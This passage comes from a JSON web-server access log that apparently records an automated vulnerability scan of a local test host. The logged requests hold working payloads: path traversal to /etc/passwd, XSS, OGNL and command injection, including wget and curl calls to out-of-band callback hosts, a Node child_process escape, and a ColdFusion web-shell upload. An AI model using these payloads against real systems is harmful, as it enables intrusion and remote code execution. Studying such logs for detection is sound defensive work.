Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.250","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/57 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fc9v8hs0smpv8c6ag07h0wc7wob9am4iig.oast.online%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.103","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.234","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.234","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.194","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.241","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.242","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CDocuments+and+Settings\x5CAll+Users\x5CApplication+Data\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.194","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.250","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ALFA_DATA/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.244","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.240","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.194","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/js/magmi_utils.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.248","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/session_password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.200","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/58 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.251","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:15 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.532","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.503","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.535","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.633","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.506","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.476","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.578","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.599","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.540","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CvCenterServer\x5Ccfg\x5Cvmware-vpx\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.522","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login?!'>\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
Command:value=\x22#form.cmd#\x22>
Options: value=\x22#form.opts#\x22>
Timeout: value=\x22#form.timeout#\x22\x0D\x0A value=\x225\x22>
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A#HTMLCodeFormat(myVar)#\x0D\x0A
\x0D\x0A
\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/../../../context/297MdtTaGLtuIvzsEe7kqcU5DVl.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.487","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plesk-stat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.348","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.238","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.326","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MbGEw4pIPbd52khSjUVFw4Y3/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.240","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.241","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.253","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.256","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:16 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://c9v8hn0smpv8c57g0t00gwk8hrekcdp1j.oast.live\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid 